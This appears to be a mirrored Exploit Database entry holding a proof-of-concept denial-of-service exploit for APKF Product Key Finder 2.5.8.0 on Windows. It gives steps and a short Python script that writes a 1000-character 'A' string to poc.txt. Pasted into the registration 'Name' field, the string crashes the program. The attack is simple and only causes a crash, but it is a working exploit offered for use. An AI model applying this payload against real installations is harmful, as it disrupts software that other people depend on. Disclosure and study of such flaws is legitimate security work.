APKF Product Key Finder 2.5.8.0 – ‘Name’ Denial of Service (PoC)

• Exploit Database
• 15 阅读

• 作者： Ismail Tasdelen
  日期： 2020-01-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47937/

• # Exploit Title: APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)
  # Exploit Author: Ismail Tasdelen
  # Exploit Date: 2020-01-16
  # Vendor Homepage : http://www.nsauditor.com/
  # Link Software : http://www.nsauditor.com/downloads/apkf_setup.exe
  # Tested on OS: Windows 10
  # CVE : N/A
  
  '''
  Proof of Concept (PoC):
  =======================
  
  1.Download and install APKF Product Key Finder
  2.Run the python operating script that will create a file (poc.txt)
  3.Run the software "Register -> Enter Registration Code
  4.Copy and paste the characters in the file (poc.txt)
  5.Paste the characters in the field 'Name' and click on 'Ok'
  6.APKF Product Key Finder Crashed
  '''
  
  #!/usr/bin/python
  
  buffer = "A" * 1000
   
  payload = buffer
  try:
  f=open("poc.txt","w")
  print("[+] Creating %s bytes evil payload." %len(payload))
  f.write(payload)
  f.close()
  print("[+] File created!")
  except:
  print("File cannot be created.")